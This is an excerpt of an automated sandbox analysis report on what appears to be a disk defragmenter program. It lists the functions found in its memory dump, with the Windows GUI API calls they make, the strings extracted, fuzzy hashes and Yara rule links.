                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3401074$3401075$3401076$3401077$8<$DiskDefrag$Mid_Back_Color$Window
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2758692112
                                                                                                                                                                                                                                                                                    • Opcode ID: a8722d59c07b94f6922f7548e3e672599eeab7783c23535719575370a0de5a5f
                                                                                                                                                                                                                                                                                    • Instruction ID: 56ac88722a8962ac1f975558d68bc042bced7a88e006b99efbc398d4c5261ff8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8722d59c07b94f6922f7548e3e672599eeab7783c23535719575370a0de5a5f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B23156B07903007AE274EB258C83FEA72659F44B14F20452FB71E762D1CEF97844565C
                                                                                                                                                                                                                                                                                    Function 0042C690 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0042C6CB
                                                                                                                                                                                                                                                                                      • Part of subcall function 0042D010: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0042D041
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                                                                                    • String ID: 3401007$3401034$3401035$8<$DiskDefrag$Frame_Color$Mid_Back_Color$Text_Color$Window$Window_Back_Gray_Color
                                                                                                                                                                                                                                                                                    • API String ID: 909852535-1675042175
                                                                                                                                                                                                                                                                                    • Opcode ID: 52757a301fae08faaa59b090e491993efb51acdf8729a0a5be35b6fc276aefa4
                                                                                                                                                                                                                                                                                    • Instruction ID: 43899c4dce7d941302b132538349e8bcafe351e88f225ab48a7149cde0acca41
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 52757a301fae08faaa59b090e491993efb51acdf8729a0a5be35b6fc276aefa4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD316F707907017BD260BAB58C43FEA76A4AF84B04F20891BB65EB75C1CAF874419B9C
                                                                                                                                                                                                                                                                                    Function 00451C80 Relevance: 18.2, APIs: 12, Instructions: 181comCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateInitializeInstance
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3519745914-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 60d459dc24a125815d5dafe60fd6d4b8e488a7a08734036bff8a68fe5d906ce4
                                                                                                                                                                                                                                                                                    • Instruction ID: 4a3acebe906db87488b43d3aef87afcda0e18f97818647458927d115f12b3f92
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60d459dc24a125815d5dafe60fd6d4b8e488a7a08734036bff8a68fe5d906ce4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08712875A183509FC310CF68C844A5ABBE8FF89B20F158A5EF99897360D775E804CF92
                                                                                                                                                                                                                                                                                    Function 0041D2E0 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 203COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • #2.OLEAUT32(80000001,DiskDefrag\Setting Option\Optimize\OptimizeList,?,?,?,?,00427EC2,BB40E64E), ref: 0041D36A
                                                                                                                                                                                                                                                                                    • #9.OLEAUT32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0041D397
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: *.avi,*.mpg,*.mpeg,*.mov,*.mkv,*.mp3,*.mp4,*.wmv$*.iso,*.bin$*.zip, *.rar$3403001$3403002$3403003$DiskDefrag\Setting Option\Optimize\OptimizeList$`=
                                                                                                                                                                                                                                                                                    • API String ID: 0-4238402903
                                                                                                                                                                                                                                                                                    • Opcode ID: be8af0238dc030f08aca80df25955cefc0936c7b45c5ded25a6e09dc14720ccf
                                                                                                                                                                                                                                                                                    • Instruction ID: 2b0b8f5636e7c6e0b71de8e83816cfbf5980d60911305a15352c27ff1d92b02b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be8af0238dc030f08aca80df25955cefc0936c7b45c5ded25a6e09dc14720ccf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD61B5B1504345AFC314EF50CC85FABB7B8FF84344F50492EF94A92160EB79A985CB9A
                                                                                                                                                                                                                                                                                    Function 0040FCA0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 189windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040FD1F
                                                                                                                                                                                                                                                                                    • GetObjectW.GDI32(?,0000005C,?), ref: 0040FD37
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040FD46
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 0040FDC3
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0040FE29
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0040FE38
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000120F,?,00000000), ref: 0040FE6C
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000120B,00000000,?), ref: 0040FE82
                                                                                                                                                                                                                                                                                    • RectVisible.GDI32(?,?), ref: 0040FEAC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$ClientRect$CursorObjectScreenVisible
                                                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                                                    • API String ID: 883400287-2564639436
                                                                                                                                                                                                                                                                                    • Opcode ID: e58942ff4a5daa3b07d53de4812bd48be39c791cdb0435b4f276cefe3218f9a6
                                                                                                                                                                                                                                                                                    • Instruction ID: e57791d17a927b35fa3e7b028ca1617c0da729b9688da5cd3a54cba97037c013
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e58942ff4a5daa3b07d53de4812bd48be39c791cdb0435b4f276cefe3218f9a6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB8119B11083819FD325DF65C984F9BB7E8FF88704F004A2DF58997291EB74A944CB96
                                                                                                                                                                                                                                                                                    Function 0042D9D0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 172windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0042DA84
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0042DAAE
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0042DAD4
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0042DAF2
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0042DB00
                                                                                                                                                                                                                                                                                    • FillRect.USER32(?,?,?), ref: 0042DB38
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0042DBBE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreateRect$BitmapClientFillMessageObjectSelectSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$ColorIndex$DiskDefrag\Setting Option\Gereral\DefragColor
                                                                                                                                                                                                                                                                                    • API String ID: 24576784-4007200279
                                                                                                                                                                                                                                                                                    • Opcode ID: 413f7938cfa32640085c5d27a34cebb069bf0ab9b2ff2f1bc307b4aa97a93b27
                                                                                                                                                                                                                                                                                    • Instruction ID: 821a5ab27c6a8f9e6b02cc0ac72b1b3995420b0d805852c9f35119affff3cd9f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 413f7938cfa32640085c5d27a34cebb069bf0ab9b2ff2f1bc307b4aa97a93b27
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2617EB1608340AFC304DF68D884E5BB7E8FF88714F408A2EF59997291DB74E944CB96
                                                                                                                                                                                                                                                                                    Function 00422890 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 139windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadMenuW.USER32(00000000), ref: 004228FF
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000004,00000000), ref: 0042292A
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(BB40E64E), ref: 00422945
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$CursorLoad
                                                                                                                                                                                                                                                                                    • String ID: 3401032$3401033$3401086$3401087$3401088$[SSD]$^H
                                                                                                                                                                                                                                                                                    • API String ID: 3043871728-172525985
                                                                                                                                                                                                                                                                                    • Opcode ID: f940a40794934a51ee4772cd30885b94db5c25453e11a9b3154fe19872a85203
                                                                                                                                                                                                                                                                                    • Instruction ID: c9e3dbd840687df198e490246c1b34f6b1a62d60348da21d10426e52b8988a23
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f940a40794934a51ee4772cd30885b94db5c25453e11a9b3154fe19872a85203
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B4196F17543006AD764EB64DC42F9F72A8AF84B10F20C91FB65EA26C0CEBC640547AD
                                                                                                                                                                                                                                                                                    Function 0040F790 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 372windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32 ref: 0040F806
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001215,00000000,00000000), ref: 0040F82F
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 0040F845
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 0040F876
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040F88B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00407E20: CopyRect.USER32(?,?), ref: 00407F0C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00407E20: CopyRect.USER32(?,?), ref: 00407F1E
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001209,00000000,00000000), ref: 0040F9EE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageRectSend$Copy$Client
                                                                                                                                                                                                                                                                                    • String ID: $6$8F
                                                                                                                                                                                                                                                                                    • API String ID: 201260696-978989186
                                                                                                                                                                                                                                                                                    • Opcode ID: 42de312bba28103fbd9c5fb933112db53f737e9031533f58468e5b08cd7e4db0
                                                                                                                                                                                                                                                                                    • Instruction ID: 8b216fbeb9dde18344444fa578b156f2309188772abd6b45e307a88af5c25f20
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42de312bba28103fbd9c5fb933112db53f737e9031533f58468e5b08cd7e4db0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4E141B15083429FD320DF25C580A9BFBE9FF88704F004A2EF49997381D778A949CB96
                                                                                                                                                                                                                                                                                    Function 00418660 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102F,00000000,00000000), ref: 004187CD
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004187EF
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 0041899B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001028,00000000,00000000), ref: 004189AF
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 004189C5
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001015,00000000,?), ref: 004189DB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CriticalEnterSection
                                                                                                                                                                                                                                                                                    • String ID: %.2f%%$%I64u$8F
                                                                                                                                                                                                                                                                                    • API String ID: 2245208738-1881348792
                                                                                                                                                                                                                                                                                    • Opcode ID: e8a4837ba97be504fd883f7b81f214d570e02bb173e6daae76494a95ea94b1e9
                                                                                                                                                                                                                                                                                    • Instruction ID: e1e33ad56b98f5e84924c458d64c7c6c02eb77d82da0e984fc61a5a5d3d1ca0d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8a4837ba97be504fd883f7b81f214d570e02bb173e6daae76494a95ea94b1e9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EA16E71304201AFD368EB24CD85FAFB7B9AF88704F40491EF64697291DBB4AC45CB5A
                                                                                                                                                                                                                                                                                    Function 00418A70 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 249windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00418B07
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419480: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0041948D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,?,00000002), ref: 00418BA8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000083FE,?,?), ref: 00418BF6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00403D70: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00403D7D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000003), ref: 00418C9F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419460: SendMessageW.USER32(?,0000100C,?,00000002), ref: 00419470
                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(?,open,explorer.exe,?,00000000,00000001), ref: 00418D51
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CriticalEnterExecuteSectionShell
                                                                                                                                                                                                                                                                                    • String ID: /e,/select,"%s%s"$8F$explorer.exe$open
                                                                                                                                                                                                                                                                                    • API String ID: 206244367-1918814442
